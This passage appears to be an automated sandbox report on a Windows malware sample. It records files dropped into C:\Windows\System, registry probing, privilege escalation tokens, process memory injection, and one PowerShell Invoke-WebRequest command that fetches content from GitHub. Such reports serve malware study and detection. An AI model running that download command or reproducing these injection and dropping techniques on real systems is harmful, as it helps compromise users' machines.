File created C:\Windows\System\osofSlt.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lXzmkYa.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ViLnHUj.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\PTDltoy.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\hoaMfPX.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\xgZZiis.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\rewqzGP.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\xFnlhWD.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\eLjBMdr.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lBWiPhC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ssqBBJo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\eilzkSk.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\esqXFrc.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\QELItCf.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\BJlBYqt.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\SsjMMnw.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\pcjzzsq.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\SNkrtqe.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\BDpMBiI.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\vVnUkqT.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\tARJRgl.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\PjAkOpH.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\TnnsOKO.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\PKMTvDE.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\aLcCKpb.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\vtPeKkG.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\tGXmgDI.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\fbeAOgx.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\KVrLJLo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\QCXvWqk.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\OoZmukQ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\uqLxXrK.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ybLNMfC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\qtVBKrC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\xCYvitD.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\NkaZDDP.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\CpXEYbS.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lBUcMSp.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\MnWJNNN.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\PpBqtkm.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\WEZYGiy.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\MhVjhhz.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\YVbsINM.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ZmYKXXQ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\Wtiepuh.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\sHLCJEP.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ekBkWqO.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\WzVkVwJ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ouFWETu.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\TNakYGU.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\RtKlPxI.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\JvzEJgr.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\VErGPwE.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\fmWAUnS.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\zgXIjCl.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\UlEyxCj.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\AVMsGlk.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\MsLPJBH.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\wtNBhfz.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\svUjkjp.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\gtanHwO.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\hnqEkbd.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFaultSecure.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFaultSecure.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFaultSecure.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 940 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 940 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 940 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\zLGcPWb.exe
PID 940 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\zLGcPWb.exe
PID 940 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mQFsvBO.exe
PID 940 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mQFsvBO.exe
PID 940 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Cklaxgu.exe
PID 940 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Cklaxgu.exe
PID 940 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fbeAOgx.exe
PID 940 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fbeAOgx.exe
PID 940 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sLKnBhc.exe
PID 940 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sLKnBhc.exe
PID 940 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sftvZTT.exe
PID 940 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sftvZTT.exe
PID 940 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\gqbhrYH.exe
PID 940 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\gqbhrYH.exe
PID 940 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OmLirDO.exe
PID 940 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OmLirDO.exe
PID 940 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\MhVjhhz.exe
PID 940 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\MhVjhhz.exe
PID 940 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mHtnkLe.exe
PID 940 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mHtnkLe.exe
PID 940 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\SIRraOO.exe
PID 940 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\SIRraOO.exe
PID 940 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Msthvdb.exe
PID 940 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Msthvdb.exe
PID 940 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\dPhRdxK.exe
PID 940 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\dPhRdxK.exe
PID 940 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OdTTrXW.exe
PID 940 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OdTTrXW.exe
PID 940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\GSnpsQD.exe
PID 940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\GSnpsQD.exe
PID 940 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wKGUGVB.exe
PID 940 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wKGUGVB.exe
PID 940 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DBalsZL.exe
PID 940 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DBalsZL.exe
PID 940 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hRkqUkH.exe
PID 940 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hRkqUkH.exe
PID 940 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Bbdyuxd.exe
PID 940 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Bbdyuxd.exe
PID 940 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\TQqamMI.exe
PID 940 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\TQqamMI.exe
PID 940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\vglspTn.exe
PID 940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\vglspTn.exe
PID 940 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wNZMGiu.exe
PID 940 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wNZMGiu.exe
PID 940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\rUaGoxM.exe
PID 940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\rUaGoxM.exe
PID 940 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\YKZfSTm.exe
PID 940 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\YKZfSTm.exe
PID 940 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\UaSPdxs.exe
PID 940 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\UaSPdxs.exe
PID 940 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DYRIhfB.exe
PID 940 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DYRIhfB.exe
PID 940 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\cOrITQH.exe
PID 940 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\cOrITQH.exe
PID 940 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fJprSFw.exe
PID 940 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fJprSFw.exe
PID 940 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\QieheqP.exe
PID 940 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\QieheqP.exe
PID 940 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hyTSDbk.exe
PID 940 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hyTSDbk.exe
PID 940 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\qkBFAQU.exe
PID 940 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\qkBFAQU.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe

"C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\zLGcPWb.exe

C:\Windows\System\zLGcPWb.exe

C:\Windows\System\mQFsvBO.exe

C:\Windows\System\mQFsvBO.exe

C:\Windows\System\Cklaxgu.exe

C:\Windows\System\Cklaxgu.exe

C:\Windows\System\fbeAOgx.exe

C:\Windows\System\fbeAOgx.exe

C:\Windows\System\sLKnBhc.exe

C:\Windows\System\sLKnBhc.exe

C:\Windows\System\sftvZTT.exe

C:\Windows\System\sftvZTT.exe

C:\Windows\System\gqbhrYH.exe

C:\Windows\System\gqbhrYH.exe

C:\Windows\System\OmLirDO.exe

C:\Windows\System\OmLirDO.exe

C:\Windows\System\MhVjhhz.exe

C:\Windows\System\MhVjhhz.exe

C:\Windows\System\mHtnkLe.exe

C:\Windows\System\mHtnkLe.exe

C:\Windows\System\SIRraOO.exe

C:\Windows\System\SIRraOO.exe

C:\Windows\System\Msthvdb.exe

C:\Windows\System\Msthvdb.exe

C:\Windows\System\dPhRdxK.exe

C:\Windows\System\dPhRdxK.exe

C:\Windows\System\OdTTrXW.exe

C:\Windows\System\OdTTrXW.exe

C:\Windows\System\GSnpsQD.exe

C:\Windows\System\GSnpsQD.exe

C:\Windows\System\wKGUGVB.exe

C:\Windows\System\wKGUGVB.exe

C:\Windows\System\DBalsZL.exe

C:\Windows\System\DBalsZL.exe

C:\Windows\System\hRkqUkH.exe

C:\Windows\System\hRkqUkH.exe

C:\Windows\System\Bbdyuxd.exe

C:\Windows\System\Bbdyuxd.exe

C:\Windows\System\TQqamMI.exe

C:\Windows\System\TQqamMI.exe

C:\Windows\System\vglspTn.exe

C:\Windows\System\vglspTn.exe

C:\Windows\System\wNZMGiu.exe

C:\Windows\System\wNZMGiu.exe

C:\Windows\System\rUaGoxM.exe

C:\Windows\System\rUaGoxM.exe

C:\Windows\System\YKZfSTm.exe

C:\Windows\System\YKZfSTm.exe

C:\Windows\System\UaSPdxs.exe

C:\Windows\System\UaSPdxs.exe

C:\Windows\System\DYRIhfB.exe

C:\Windows\System\DYRIhfB.exe

C:\Windows\System\cOrITQH.exe

C:\Windows\System\cOrITQH.exe

C:\Windows\System\fJprSFw.exe

C:\Windows\System\fJprSFw.exe

C:\Windows\System\QieheqP.exe

C:\Windows\System\QieheqP.exe

C:\Windows\System\hyTSDbk.exe

C:\Windows\System\hyTSDbk.exe

C:\Windows\System\qkBFAQU.exe

C:\Windows\System\qkBFAQU.exe

C:\Windows\System\QGGqJKa.exe

C:\Windows\System\QGGqJKa.exe

C:\Windows\System\EVWKxVh.exe

C:\Windows\System\EVWKxVh.exe

C:\Windows\System\UOZEPpS.exe

C:\Windows\System\UOZEPpS.exe

C:\Windows\System\qChdeXc.exe

C:\Windows\System\qChdeXc.exe

C:\Windows\System\sHLCJEP.exe

C:\Windows\System\sHLCJEP.exe

C:\Windows\System\PTDltoy.exe

C:\Windows\System\PTDltoy.exe

C:\Windows\System\OMLMVxQ.exe

C:\Windows\System\OMLMVxQ.exe

C:\Windows\System\whZqEbZ.exe

C:\Windows\System\whZqEbZ.exe

C:\Windows\System\aHKIWtK.exe

C:\Windows\System\aHKIWtK.exe

C:\Windows\System\Wruzkcw.exe

C:\Windows\System\Wruzkcw.exe

C:\Windows\System\kRrBBbD.exe

C:\Windows\System\kRrBBbD.exe

C:\Windows\System\LkSrxnd.exe

C:\Windows\System\LkSrxnd.exe

C:\Windows\System\yhblSEe.exe

C:\Windows\System\yhblSEe.exe

C:\Windows\System\LSCjWCS.exe

